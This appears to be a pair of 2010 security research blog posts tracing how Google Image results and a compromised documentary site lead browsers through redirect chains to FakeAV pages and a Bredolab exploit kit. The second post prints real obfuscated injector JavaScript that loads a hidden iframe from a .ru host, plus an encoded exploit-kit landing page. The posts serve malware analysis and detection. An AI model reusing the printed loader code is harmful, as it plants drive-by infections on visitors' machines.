Trojaned Binaries

Google Image Searches Leading To FakeAV Sites

Eoin Miller — Fri, 03 Sep 2010 22:59:32 +0000

We have seen several pages created on extremely cheap name registrar/hosting services (the likes of co.cc and cz.cc primarily) that have images of specific things along with lots of related text about that specific image surrounding it in order to increase it within the Google Images search rankings. While this in and of its self is nothing new (people have been doing this since the dawn of search engines to up their hits) the fact that a user can keep their browser at www.google.com and load content from some malicious FakeAV or drive by kit is a bit of a game changer. This gives malicious people a very easy avenue to drive hits to their exploit kits without having to compromise massive amounts of wordpress blogs, run/defraud malicious types of advertising or produce tons of email spam. Below we go over one of the examples identified in the wild.

The URL we stumbled upon during research was as follows, yes this is real and live:

http://www.google.com/imgres?imgurl=http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg&imgrefurl=http://dzr4n.com/_vti_tmp/john-drake.html&usg=__M4-04y3qiUsdvd8zXWOk_G2K1qc=&h=370&w=441&sz=158&hl=en&start=8&zoom=1&um=1&itbs=1&tbnid=ut-iq_wdKMHNqM:&tbnh=107&tbnw=127&prev=/images%3Fq%3DJohn%2BLindly%26um%3D1%26hl%3Den%26safe%3Dactive%26sa%3DN%26rlz%3D1T4GGLD_enUS306US306%26tbs%3Disch:1

If we review the contents of this URL, we notice that we have some different components to it:

www.google.com/imgres?imgurl= - Just good old Google Images
http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg - Location of an image file on the Internet. Nothing special about this either.
http://dzr4n.com/_vti_tmp/john-drake.html - Redirects users to a FakeAV scanner page if and only if you have a referrer from Google Images.

Now if we load this URL, this is what it will look like in Firefox with NoScript and Firebug running for a little bit of analysis:

You notice the user is just using google image search, but now www.google.com is loading up the content of that website within an IFRAME shown in the code snippet below:

="http://dzr4n.com/_vti_tmp/john-drake.html" id=il_f frameborder=0 scrolling="no">

Now, when we make a request to that server using the following referrer, the malicious server will provide the client with a redirect to the FakAV site. However if you go there directly you will see a garbage blog page with the picture (and several others from other sites) along with lots of tags and keywords related to various people named John Drake. Below are the request genereated by attempting to load the above IFRAME and the 302 HTTP status code redirect:

GET /_vti_tmp/john-drake.html HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.google.com/imgres?imgurl=http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg&imgrefurl=http://dzr4n.com/_vti_tmp/john-drake.html&usg=__M4-04y3qiUsdvd8zXWOk_G2K1qc=&h=370&w=441&sz=158&hl=en&start=8&zoom=1&um=1&itbs=1&tbnid=ut-iq_wdKMHNqM:&tbnh=107&tbnw=127&prev=/images%3Fq%3DJohn%2BLindly%26um%3D1%26hl%3Den%26safe%3Dactive%26sa%3DN%26rlz%3D1T4GGLD_enUS306US306%26tbs%3Disch:1
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: dzr4n.com
Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily
Date: Fri, 03 Sep 2010 22:34:40 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Location: http://dwedwedwed.co.cc/?777
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

You notice that it redirects to a domain we haven’t seen before in the disucussion, the dwedwedwed.co.cc/?777. This is because there are some intermediary servers that will eventually cause the client using Google Images to finally end up at the FakeAV site of froltartemo.cz.cc, here we show the following steps that are undertaken to get to the FakAV site:

GET /?777 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.google.com/imgres?imgurl=http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg&imgrefurl=http://dzr4n.com/_vti_tmp/john-drake.html&usg=__M4-04y3qiUsdvd8zXWOk_G2K1qc=&h=370&w=441&sz=158&hl=en&start=8&zoom=1&um=1&itbs=1&tbnid=ut-iq_wdKMHNqM:&tbnh=107&tbnw=127&prev=/images%3Fq%3DJohn%2BLindly%26um%3D1%26hl%3Den%26safe%3Dactive%26sa%3DN%26rlz%3D1T4GGLD_enUS306US306%26tbs%3Disch:1
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: dwedwedwed.co.cc

HTTP/1.1 302 Found
Date: Fri, 03 Sep 2010 22:38:10 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.6-1+lenny8 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny8
Expires: Thu, 21 Jul 1977 07:30:00 GMT
Last-Modified: Fri, 03 Sep 2010 22:38:10 GMT
Cache-Control: max-age=0
Pragma: no-cache
Set-Cookie: sid=1S2; expires=Sun, 05-Sep-2010 00:33:45 GMT; path=/
LOCATION: http://dwedwedwed.co.cc/t/bak.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html; charset=utf-8

....................

Causes the next request response:

GET /t/bak.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.google.com/imgres?imgurl=http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg&imgrefurl=http://dzr4n.com/_vti_tmp/john-drake.html&usg=__M4-04y3qiUsdvd8zXWOk_G2K1qc=&h=370&w=441&sz=158&hl=en&start=8&zoom=1&um=1&itbs=1&tbnid=ut-iq_wdKMHNqM:&tbnh=107&tbnw=127&prev=/images%3Fq%3DJohn%2BLindly%26um%3D1%26hl%3Den%26safe%3Dactive%26sa%3DN%26rlz%3D1T4GGLD_enUS306US306%26tbs%3Disch:1
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: dwedwedwed.co.cc

HTTP/1.1 200 OK
Date: Fri, 03 Sep 2010 22:38:11 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.6-1+lenny8 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny8
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 243
Connection: close
Content-Type: text/html; charset=utf-8




404 Not Found

Above we can see the use of a purposeful 404 that causes the client to finally get redirected to the FakeAV page. When this loads the browser is resized and hidden behind a prompt box in order to attempt to trick the user into downloading and executing a binary:

From there on out, it is somewhat up to how good your Antivirus solution is at detecting this stuff and the users willingness to click executables they may think they just downloaded from Google.

Bredolab Infections And The Compromised Sites That Redirect Clients To The Drive Bys

Eoin Miller — Fri, 13 Aug 2010 23:14:59 +0000

The bredolab infections we commonly see use compromised websites to redirect clients going to legitimate websites . This is in contrast to the SEO exploit sites that rely almost exclusively on malvertising for driving people to them. The amount of people driven to the bredolab boxes are not nearly as high as you might imagine and they really aren’t anymore difficult to track. Below we will go step by step through a client visiting a website until they became infected. Here we see the first request we are going to take note of. The user searched for a term in Google and clicked on a link that was within the results hosted on www.iwatchdocumentaries.com:

GET /documenatries/louis-theroux-americas-medicated-kids-2010/ HTTP/1.1
Accept: */*
Referer: http://www.google.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: www.iwatchdocumentaries.com
Connection: Keep-Alive

Now the response from this request is quite lengthy so we are going to trim it down a bit and focus on some JavaScript that is called from a streaming media providers site:

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 28978
Content-Type: text/html
Date: Fri, 13 Aug 2010 
Keep-Alive: timeout=15, max=1000
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Set-Cookie: vid_count_=; expires=Sat, 13-Aug-2011 
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.9




Watch "Louis Theroux: America's Medicated Kids" (2010) Free - Watch Documentaries Online







---TONS OF STUFF OMITTED FOR THE SAKE OF BREVITY---

Now, what is going to cause the client to end up requesting the drive by is the contents of the http://deliver.theiwatchnetwork.com/5/iwatch_05.js JavaScript file. When the client requests this, the end of that JavaScript contains this at the very end:

HTTP/1.1 200 OK
Cache-Control: max-age=6048000
Connection: keep-alive
Content-Length: 156825
Content-Type: application/x-javascript
Date: Fri, 13 Aug 2010 
ETag: 
Expires: Fri, 22 Oct 2010 
Last-Modified: Thu, 12 Aug 2010 
Server: CacheFlyServe v26b
X-CF1: fC.ord1:hf

---TONS OF STUFF OMITTED FOR THE SAKE OF BREVITY---
document.write('http://pocketbloke.ru/Facebook.js">');

This of course causes the client to make a request to the http://pocketblock.ru/Facebook.js, here is the content of the response of the server from that request, in its entirety:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Aug 2010 
Content-Type: text/javascript
Connection: close
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 1256

try{
var U3uj00dp58;
function Xgdvqin(){

if (typeof(document.body) == 'object'){
clearInterval(U3uj00dp58);
}else{
return true;
}
Ek09wc1guj = '';
Rlg92ocpa = ['src','h>e>ingnh>tv'.replace(/[vn,4\>]/g, ''), 'wzi#dpt#hM'.replace(/[M#z\!p]/g, '')];
function Gp3paj1lm(Eta8efwl037,Vmmu4gc2m,Imzsoblt938q4f){
return Eta8efwl037.setAttribute(Vmmu4gc2m,Imzsoblt938q4f);
}
function Yjcsup30i4t(Idfrg0lo9s){
return document.createElement(Idfrg0lo9s);
}
Elakx6em19 = 'p';
Xf2wek912 = window.frames.length;
if (Xf2wek912<20) Elakx6em19 = 'i5f4r5anm4e<'.replace(/[\<5\]4n]/g, '');
Egi14av = 'US';
Vt5pcf3zu80 = '2679997376';
Oskptba3 = 'http://punkdye.ru:8080/index.php?pid=1&Cxuuxx0tgpkezo09='+Xf2wek912;
Nnkuah4e4bj4 = 1060243405;
Ki6v57vs = Yjcsup30i4t('div');
Ki6v57vs.id = 'Ai6lruxkgj';
Ki6v57vs.name = 'Ai6lruxkgj';
Nnkuah4e4bj4 -= 530121702.5*2;
document.body.appendChild(Ki6v57vs);
H9cgm6y3fl = 'Nnkuah4e4bj4';
L2h514hotu = new Array(Oskptba3, Nnkuah4e4bj4,Nnkuah4e4bj4);
Cgnjln5alh = document.createElement(Elakx6em19);
for (Eizoi0xp in Rlg92ocpa){
Gp3paj1lm(Cgnjln5alh,Rlg92ocpa[Eizoi0xp], L2h514hotu[Eizoi0xp]);
}
document.getElementById('Ai6lruxkgj').appendChild(Cgnjln5alh);
}
U3uj00dp58 = window.setInterval(Xgdvqin, '300');
}catch(Ekdyic4zi9u){}

Now we could deobfuscate this, but we don’t really have to. It is pretty obvious that this piece of JavaScript is going to cause the client to go to punkdye.ru on port 8080 through an iframe, and that seems just a little bit more than suspicious. And of course, the client then makes this request next:

GET /index.php?pid=1&Cxuuxx0tgpkezo09=0 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.iwatchdocumentaries.com/documenatries/louis-theroux-americas-medicated-kids-2010/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: punkdye.ru:8080
Connection: Keep-Alive

Which gives us this response from the server that is obfuscated data and JavaScript that is the landing page of this type of drive by kit (whos name I am unsure of). This response is able to be sig’d on based on the hidden visibility div tag with great accuracy:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Aug 2010 
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Set-Cookie: pid=1; expires=Fri, 13-Aug-2010

e95

Xrgea3q5co5j0

102Q99Q37Q37Q97Q108Q96Q114Q106Q98Q107Q113Q43Q94Q105Q105Q38Q35Q35Q37Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q94Q109Q109Q83Q98Q111Q112Q102Q108Q107Q43Q102Q107Q97Q98Q117Q76Q99Q37Q36Q74Q80Q70Q66Q29Q52Q43Q36Q38Q30Q58Q42Q46Q38Q38Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q116Q111Q102Q113Q98Q37Q31Q57Q102Q99Q111Q94Q106Q98Q29Q112Q111Q96Q58Q89Q31Q101Q96Q109Q55Q44Q44Q112Q98Q111Q115Q102Q96Q98Q112Q44Q112Q98Q94Q111Q96Q101Q60Q110Q114Q98Q111Q118Q58Q35Q113Q108Q109Q102Q96Q58Q101Q96Q109Q55Q44Q44Q112Q118Q112Q113Q98Q106Q44Q112Q118Q112Q102Q107Q99Q108Q44Q112Q118Q112Q102Q107Q99Q108Q106Q94Q102Q107Q43Q101Q113Q106Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q
34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q43Q43Q34Q50Q64Q43Q43Q34Q50Q64Q112Q118Q112Q102Q107Q99Q108Q106Q94Q102Q107Q43Q101Q113Q106Q34Q114Q45Q45Q48Q99Q112Q115Q111Q58Q34Q48Q64Q112Q96Q111Q102Q109Q113Q40Q97Q98Q99Q98Q111Q34Q48Q66Q98Q115Q94Q105Q34Q47Q53Q114Q107Q98Q112Q96Q94Q109Q98Q34Q47Q53Q34Q47Q52Q107Q98Q116Q34Q47Q63Q62Q96Q113Q102Q115Q98Q85Q76Q95Q103Q98Q96Q113Q34Q47Q50Q47Q53Q34Q47Q50Q47Q47Q116Q112Q96Q111Q102Q109Q113Q43Q112Q101Q98Q105Q105Q34Q47Q50Q47Q47Q34Q47Q50Q47Q54Q43Q79Q114Q107Q34Q47Q50Q47Q53Q34Q47Q50Q47Q47Q96Q106Q97Q34Q47Q63Q34Q47Q50Q47Q67Q96Q34Q47Q63Q96Q97Q34Q47Q63Q43Q43Q34Q47Q50Q47Q67Q34Q47Q50Q47Q51Q98Q96Q101Q108Q34Q47Q63Q99
Q114Q107Q96Q113Q102Q108Q107Q34Q47Q63Q94Q54Q34Q47Q50Q47Q53Q95Q51Q34Q47Q50Q47Q54Q34Q47Q50Q52Q63Q111Q83Q92Q92Q34Q47Q50Q48Q63Q99Q108Q111Q34Q47Q50Q47Q53Q102Q83Q95Q51Q43Q105Q98Q107Q100Q113Q101Q34Q47Q50Q48Q63Q102Q34Q47Q50Q48Q66Q83Q45Q34Q47Q50Q48Q63Q102Q42Q42Q34Q47Q50Q47Q54Q111Q34Q47Q50Q47Q63Q83Q95Q51Q43Q96Q101Q94Q111Q62Q113Q34Q47Q50Q47Q53Q102Q34Q47Q50Q47Q54Q34Q47Q50Q48Q63Q111Q98Q113Q114Q111Q107Q34Q47Q63Q111Q34Q47Q50Q52Q65Q107Q98Q116Q34Q47Q63Q67Q114Q107Q96Q113Q102Q108Q107Q34Q47Q50Q47Q53Q94Q54Q34Q47Q50Q47Q53Q92Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q47Q34Q47Q50Q47Q64Q71Q98Q117Q98Q43Q113Q111Q94Q113Q112Q71Q34Q47Q50Q47Q53Q34Q47Q50Q50Q65Q71Q98Q105Q102Q71Q34Q47Q50Q410007Q63Q71Q67Q108Q81Q98Q115Q94Q80Q71Q34Q47Q50Q50Q63Q108Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q34Q47Q50Q50Q65Q71Q118Q97Q108Q63Q98Q112Q107Q108Q71Q34Q47Q50Q47Q63Q71Q109Q112Q98Q111Q71Q34Q47Q50Q50Q63Q117Q34Q47Q50Q47Q53Q98Q113Q102Q111Q84Q43Q108Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q34Q47Q50Q47Q53Q107Q98Q109Q76Q43Q108Q34Q47Q50Q48Q63Q46Q83Q98Q109Q118Q81Q43Q108Q34Q47Q50Q48Q63Q48Q83Q98Q97Q108Q74Q43Q108Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q105Q105Q114Q107Q34Q47Q50Q47Q53Q97Q107Q98Q112Q43Q117Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q45Q34Q47Q50Q47Q64Q71Q46Q83Q97Q102Q109Q34Q47Q50Q47Q51Q46Q83Q97Q102Q34Q47Q50Q48Q67Q109Q101Q109Q43Q98Q106Q108Q96Q105Q98Q116Q34Q47Q50Q47Q67Q45Q53Q45Q53Q34Q47Q50Q48Q62Q114Q111Q43Q98Q118Q97Q104Q107Q114Q109Q34Q47Q50Q47Q67Q34Q47Q50Q47Q67Q34Q47Q50Q48Q62Q109Q113Q113Q101Q71Q34Q47Q50Q47Q64Q71Q81Q66Q68Q71Q3
4Q47Q50Q47Q53Q107Q98Q109Q108Q43Q117Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q71Q77Q81Q81Q69Q73Q71Q34Q47Q50Q47Q63Q71Q74Q85Q43Q113Q99Q108Q112Q108Q111Q96Q102Q74Q71Q34Q47Q50Q47Q53Q94Q34Q47Q63Q116Q98Q107Q83Q117Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q118Q34Q47Q50Q47Q53Q94Q34Q47Q63Q116Q98Q107Q83Q108Q34Q47Q50Q48Q63Q71Q106Q94Q98Q111Q113Q80Q43Q63Q65Q76Q65Q62Q71Q83Q118Q34Q47Q50Q48Q63Q34Q47Q50Q50Q65Q71Q113Q96Q98Q71Q34Q47Q50Q47Q63Q71Q103Q95Q76Q85Q98Q115Q102Q71Q34Q47Q50Q47Q63Q71Q113Q96Q62Q71Q34Q47Q50Q50Q63Q112Q102Q101Q113Q34Q47Q63Q83Q34Q47Q63Q94Q92Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q34Q47Q50Q47Q53Q34Q47Q50Q47Q54Q34Q47Q50Q48Q63Q34Q47Q50Q48Q66Q43Q103Q112Q34Q47Q50Q47Q51Q96Q112Q96Q111Q102Q109Q113Q34Q47Q63Q43Q103Q112Q34Q47Q50Q47Q51Q97Q98Q105Q34Q47Q63Q34Q47Q50Q47Q67Q110Q34Q47Q63Q43Q103Q112Q34Q47Q50Q47Q51Q112Q113Q94Q111Q113Q43Q98Q117Q98Q34Q47Q50Q52Q64Q113Q94Q112Q104Q104Q102Q105Q105Q34Q47Q63Q34Q47Q50Q47Q67Q67Q34Q47Q63Q34Q47Q50Q47Q67Q70Q74Q34Q47Q63Q101Q98Q105Q109Q34Q47Q50Q47Q62Q34Q47Q50Q47Q47Q43Q111Q98Q109Q105Q94Q96Q98Q34Q47Q50Q47Q53Q34Q47Q50Q47Q67Q71Q34Q47Q50Q47Q67Q100Q34Q47Q50Q47Q64Q80Q113Q111Q102Q107Q100Q43Q99Q111Q108Q106Q64Q101Q94Q111Q64Q108Q97Q98Q34Q47Q50Q47Q53Q48Q49Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q43Q111Q98Q109Q105Q94Q96Q98Q34Q47Q50Q47Q53Q34Q47Q50Q47Q67Q83Q34Q47Q50Q47Q67Q100Q34Q47Q50Q47Q64Q80Q113Q111Q102Q107Q100Q43Q99Q111Q108Q106Q64Q101Q94Q111Q64Q108Q97Q98Q34Q47Q50Q47Q53Q51Q46Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q43Q111Q98Q109Q105Q94Q96Q98Q34Q47Q50Q47Q53Q34Q47Q5
0Q47Q67Q92Q34Q47Q50Q47Q67Q100Q34Q47Q50Q47Q64Q80Q113Q111Q102Q107Q100Q43Q99Q111Q108Q106Q64Q101Q94Q111Q64Q108Q97Q98Q34Q47Q50Q47Q53Q48Q54Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q34Q47Q50Q47Q64Q45Q34Q47Q50Q47Q64Q46Q34Q47Q50Q47Q54Q34Q47Q52Q34Q47Q54Q34Q47Q54Q34Q48Q64Q34Q47Q67Q112Q96Q111Q102Q109Q113Q34Q48Q66Q89Q31Q59Q57Q44Q102Q99Q111Q94Q106Q98Q59Q31Q38Q56Q7Q29Q29Q29Q29Q65Q51Q95Q102Q119Q52Q50Q45Q29Q58Q29Q107Q98Q116Q29Q62Q111Q111Q94Q118Q37Q31Q62Q96Q111Q108Q77Q65Q67Q43Q77Q65Q67Q31Q41Q29Q31Q77Q65Q67Q43Q77Q97Q99Q64Q113Q111Q105Q31Q38Q56Q7Q29Q29Q29Q29Q99Q108Q111Q37Q102Q29Q102Q107Q29Q65Q51Q95Q102Q119Q52Q50Q45Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q113Q111Q118Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q78Q96Q97Q100Q96Q102Q102Q29Q58Q29Q107Q98Q116Q29Q62Q96Q113Q102Q115Q98Q85Q76Q95Q103Q98Q96Q113Q37Q65Q51Q95Q102Q119Q52Q50Q45Q88Q102Q90Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q102Q99Q29Q37Q78Q96Q97Q100Q96Q102Q102Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q85Q107Q50Q46Q110Q46Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q102Q99Q111Q94Q106Q98Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q85Q107Q50Q46Q110Q46Q43Q112Q98Q113Q62Q113Q113Q111Q102Q95Q114Q113Q98Q37Q31Q112Q111Q96Q31Q41Q29Q31Q75Q108Q113Q98Q112Q46Q43Q109Q97Q99Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q85Q107Q50Q46Q110Q46Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q122Q7Q2
9Q29Q29Q29Q29Q29Q29Q29Q122Q96Q94Q113Q96Q101Q37Q98Q38Q120Q122Q7Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q7Q29Q29Q29Q29Q113Q111Q118Q120Q7Q29Q29Q29Q29Q102Q99Q29Q37Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q103Q94Q115Q94Q66Q107Q94Q95Q105Q98Q97Q37Q38Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q66Q99Q98Q53Q46Q101Q113Q95Q29Q58Q29Q97Q108Q96Q114Q106Q98147cQ107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q102Q99Q111Q94Q106Q98Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q66Q99Q98Q53Q46Q101Q113Q95Q43Q112Q98Q113Q62Q113Q113Q111Q102Q95Q114Q113Q98Q37Q31Q112Q111Q96Q31Q41Q29Q31Q62Q109Q109Q105Q98Q113Q46Q43Q101Q113Q106Q105Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q66Q99Q98Q53Q46Q101Q113Q95Q38Q56Q7Q29Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q29Q122Q96Q94Q113Q96Q101Q37Q98Q38Q120Q122Q7Q29Q29Q29Q29Q7Q29Q29Q29Q29Q113Q111Q118Q120Q7Q29Q29Q29Q29Q102Q99Q29Q37Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q103Q94Q115Q94Q66Q107Q94Q95Q105Q98Q97Q37Q38Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q7Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q102Q109Q112Q29Q58Q29Q88Q31Q46Q52Q49Q43Q46Q49Q48Q43Q46Q49Q50Q43Q47Q48Q49Q31Q41Q29Q31Q46Q53Q49Q43Q53Q47Q43Q48Q53Q43Q51Q53Q31Q41Q29Q31Q46Q54Q53Q43Q46Q49Q50Q43Q46Q46Q51Q43Q52Q46Q31Q41Q29Q31Q47Q45Q52Q43Q46Q54Q46Q43Q47Q47Q54Q43Q46Q51Q51Q31Q41Q29Q31Q47Q45Q52Q43Q50Q53Q43Q46Q53Q54Q43Q46Q48Q48Q31Q41Q29Q31Q47Q46Q47Q43Q46Q52Q50Q43Q49Q50Q43Q47Q49Q50Q31Q41Q29Q31Q51Q53Q43Q47Q48Q48Q43Q49Q43Q47Q52Q31Q90Q56Q7
